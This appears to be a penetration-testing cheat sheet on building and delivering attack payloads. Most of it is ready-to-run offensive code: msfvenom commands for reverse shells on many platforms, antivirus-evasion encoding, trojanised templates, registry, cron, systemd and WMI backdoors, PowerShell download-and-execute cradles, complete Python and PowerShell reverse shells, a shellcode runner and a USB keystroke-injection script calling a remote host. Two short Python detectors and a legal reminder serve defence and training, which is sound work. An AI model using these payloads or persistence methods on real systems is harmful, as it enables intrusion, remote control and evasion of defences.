Payload Development

Creating and customizing payloads for various exploitation scenarios

Payload Types & Classifications

Staged vs Stageless Payloads

Staged Payloads:
  • Small initial payload (the stager) that downloads the larger stage
  • Better for size-constrained environments
  • Example: windows/meterpreter/reverse_tcp (slash between payload and handler type)
Stageless Payloads:
  • Complete payload in one package
  • Larger size but more reliable
  • Better for unstable networks
  • Example: windows/meterpreter_reverse_tcp (underscore marks the stageless variant)

Payload Formats

Executable Formats

# Windows executable
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o payload.exe

# Linux executable
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o payload.elf

# Mac executable
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f macho -o payload.macho

Script Formats

# PowerShell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f psh -o payload.ps1

# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o payload.py

# Bash
msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.10 LPORT=4444 -f raw -o payload.sh

Web Formats

# PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o payload.php

# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f asp -o payload.asp

# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o payload.jsp

Advanced Payload Generation

Encoded Payloads

# x86 shikata_ga_nai encoder
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe

# x64 encoder
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -e x64/xor -i 3 -f exe -o encoded64.exe

# Multiple encoders
# Note: msfvenom keeps only the last -e given, so this command applies x86/countdown alone;
# chaining two encoders means piping -f raw output back into a second msfvenom run.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -e x86/shikata_ga_nai -e x86/countdown -i 3 -f exe -o multi_encoded.exe

Custom Templates

# Using custom template
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -x /path/to/template.exe -f exe -o templated.exe

# Keeping template functionality (-k runs the payload in a new thread so the template still works)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -x /path/to/template.exe -k -f exe -o templated_keep.exe

Platform-Specific Payloads

Windows Payloads

# Meterpreter reverse TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o meterpreter.exe

# Meterpreter bind TCP
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o bind_meterpreter.exe

# Shell reverse TCP
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o shell.exe

# PowerShell reverse
msfvenom -p windows/powershell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o powershell_reverse.exe

# Add user payload
msfvenom -p windows/adduser USER=hacker PASS=Password123 -f exe -o adduser.exe

Linux Payloads

# Meterpreter reverse TCP
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o meterpreter.elf

# Shell reverse TCP
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o shell.elf

# Bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f elf -o bind_shell.elf

Android Payloads

# Android meterpreter (raw output is already an APK for this payload)
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -o android_payload.apk

Backdoor Payloads

Persistent Backdoors

Windows Registry Backdoor

# Registry run key
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o backdoor.exe

# Add registry persistence
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Public\backdoor.exe"

Linux Cron Job Backdoor

# Cron job persistence
echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'" | crontab -

# Systemd service persistence
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=System Update Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
Restart=always

[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor.service
systemctl start backdoor.service

Fileless Payloads

PowerShell Fileless

# Base64 encoded PowerShell payload (-e expects Base64 of UTF-16LE text, hence Encoding.Unicode)
$payload = "IEX ((new-object net.webclient).downloadstring('http://10.10.10.10/payload.ps1'))"
$encoded = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($payload))
powershell.exe -nop -w hidden -e $encoded

WMI Persistence

# WMI event subscription: filter (trigger), consumer (action), and the binding between them
wmic /namespace:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

wmic /namespace:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\backdoor.exe", CommandLineTemplate="C:\Windows\System32\backdoor.exe"

wmic /namespace:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
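The registry Run key, cron, systemd and WMI entries above all leave artefacts that a host review can match on. The following Python is an added example (not from the original page) that scans a constructed set of such entries for the indicators those sections contain; the sample entries, the indicator names and the OneDrive/apt-get benign controls are constructed for illustration.

```python
import re

# Constructed sample persistence entries modelled on the registry, cron,
# systemd and WMI examples above (not collected from a real host).
SAMPLES = [
    ("registry", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = C:\Users\Public\backdoor.exe"),
    ("registry", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"),
    ("crontab", "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"),
    ("crontab", "0 3 * * * /usr/bin/apt-get update"),
    ("systemd", "ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"),
    ("wmi", r'CommandLineEventConsumer Name="BotConsumer23" CommandLineTemplate="C:\Windows\System32\backdoor.exe"'),
]

# Indicators taken from the persistence techniques this page describes.
INDICATORS = {
    "bash_reverse_shell": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "interactive_bash": re.compile(r"\bbash\s+-i\b"),
    "user_writable_exe": re.compile(r"C:\\Users\\Public\\[^\s\"]+\.exe", re.I),
    "wmi_cmdline_consumer": re.compile(r"\bCommandLineEventConsumer\b", re.I),
    "hidden_powershell": re.compile(r"powershell[^|&]*-w(?:indowstyle)?\s+hidden", re.I),
}

def scan_entry(text):
    """Return the names of all indicators that match one persistence entry."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_all(samples):
    """Return (source, entry, indicators) for every entry with at least one hit."""
    hits = []
    for source, text in samples:
        found = scan_entry(text)
        if found:
            hits.append((source, text, found))
    return hits

if __name__ == "__main__":
    for source, text, found in scan_all(SAMPLES):
        print(f"[{source}] {', '.join(found)}: {text}")
```

The two benign entries produce no hits, which is the property to preserve when extending the indicator table.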

Payload Obfuscation Techniques

Encoding Methods

Base64 Encoding
Simple encoding for basic obfuscation
XOR Encoding
Bitwise XOR with key for payload hiding
ROT13/Caesar Cipher
Character rotation for text payloads
Hexadecimal Encoding
Converting to hex representation

Encryption Methods

# AES encryption example
openssl enc -aes-256-cbc -in payload.exe -out payload.enc -k secretkey

# RC4 encryption
python rc4_encrypt.py payload.exe secretkey payload.enc

Polymorphic Payloads

Polymorphic Techniques:
  • Dynamic code generation
  • Variable encryption keys
  • Randomized instruction sequences
  • Garbage code insertion
  • Register substitution

Anti-Detection Techniques

Antivirus Evasion

# Multiple encoding iterations
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o encoded_payload.exe

# Custom encoding with Veil
python /opt/Veil/Veil.py

Sandbox Evasion

# Pseudocode: sleep(), click_detected(), is_virtual_machine() and execute_payload()
# stand for whatever the payload uses for each check.

# Time-based evasion
sleep(300)  # Wait 5 minutes before execution

# User interaction check
if click_detected():
    execute_payload()

# Environment checks
if not is_virtual_machine():
    execute_payload()

Behavioral Evasion

Evasion Techniques:
  • Legitimate process injection
  • DLL side-loading
  • Process hollowing
  • LOLBAS (Living Off the Land Binaries and Scripts)
  • Memory-only execution

Custom Payload Development

C/C++ Payloads

#include <windows.h>
#include <string.h>

int main() {
    // Shellcode buffer (placeholder NOPs; the real payload bytes go here)
    unsigned char shellcode[] = "\x90\x90\x90\x90";

    // Allocate memory
    LPVOID mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (mem == NULL) {
        return 1;
    }

    // Copy shellcode
    memcpy(mem, shellcode, sizeof(shellcode));

    // Execute
    ((void(*)())mem)();
    return 0;
}

Python Payloads

import socket
import subprocess

def reverse_shell(host, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    while True:
        command = s.recv(1024).decode()
        # An empty read means the listener closed the connection
        if not command or command.strip().lower() == 'exit':
            break
        try:
            output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
            s.send(output)
        except Exception as e:
            s.send(str(e).encode())
    s.close()

if __name__ == "__main__":
    reverse_shell("10.10.10.10", 4444)

PowerShell Payloads

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2 = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()

Payload Delivery Methods

Web-Based Delivery

# HTTP download and execute
powershell -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10/payload.ps1')"

# Encoded web delivery
powershell -enc
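The -e/-enc encoding used in the PowerShell Fileless section and here is reversible, and decoding it is the first step when triaging such a command line. The following Python is an added example, not from the original page; the sample command line is constructed by encoding the page's own download cradle the same way that section does.

```python
import base64
import re

# Constructed sample: the cradle from the PowerShell Fileless section, encoded
# as that section does it (UTF-16LE, then Base64) to form a -e argument.
SAMPLE_CRADLE = "IEX ((new-object net.webclient).downloadstring('http://10.10.10.10/payload.ps1'))"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = f"powershell.exe -nop -w hidden -e {SAMPLE_ENCODED}"

# Spellings powershell.exe accepts for -EncodedCommand; Base64 alphabet only after it.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RX = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
URL_RX = re.compile(r"https?://[^\s'\"()]+", re.I)
# Download-cradle markers from the fileless and web-delivery sections above.
CRADLE_MARKERS = ("iex", "invoke-expression", "net.webclient", "downloadstring", "downloadfile", "invoke-webrequest")

def decode_encoded_command(cmdline):
    """Return the script carried by -e/-enc, or None if absent or not valid UTF-16LE Base64."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(cmdline):
    """Summarise a PowerShell command line: decoded script, hidden window, cradle markers, URLs."""
    script = decode_encoded_command(cmdline)
    body = script if script is not None else cmdline
    low = body.lower()
    return {
        "decoded": script,
        "hidden_window": bool(HIDDEN_RX.search(cmdline)),
        "markers": [mk for mk in CRADLE_MARKERS if mk in low],
        "urls": URL_RX.findall(body),
    }

if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```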

Email Delivery

Macro-Enabled Documents
Office documents with malicious macros
PDF Exploits
Malicious PDF documents
Archive Files
Password-protected archives with payloads

USB/Physical Delivery

REM Rubber Ducky script
DELAY 2000
GUI r
DELAY 500
STRING powershell -windowstyle hidden -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10/payload.ps1')"
ENTER

Payload Testing and Validation

Sandbox Testing

Testing Environments:
  • Isolated virtual machines
  • Containerized environments
  • Cloud-based sandboxes
  • Physical air-gapped systems

Antivirus Testing

# Test against multiple AV engines

# VirusTotal API
curl -X POST 'https://www.virustotal.com/vtapi/v2/file/scan' -F 'key=YOUR_API_KEY' -F 'file=@payload.exe'

# NoDistribute.com (private scanning)
# Upload payloads for private AV testing

Functionality Testing

# Test payload execution
./payload.exe

# Verify network connections
netstat -an | grep 4444

# Check process creation
ps aux | grep payload

Legal and Ethical Considerations

Important Legal Reminders:
  • Only create and use payloads on authorized systems
  • Ensure proper scope and rules of engagement
  • Document all payload usage and impact
  • Remove payloads and persistence after testing
  • Protect payload code and prevent unauthorized use
  • Report findings through proper channels

Responsible Disclosure

Best Practices:
  • Clean up all payloads after testing
  • Document exploitation methods clearly
  • Provide remediation guidance
  • Maintain confidentiality of vulnerabilities
  • Follow coordinated disclosure timelines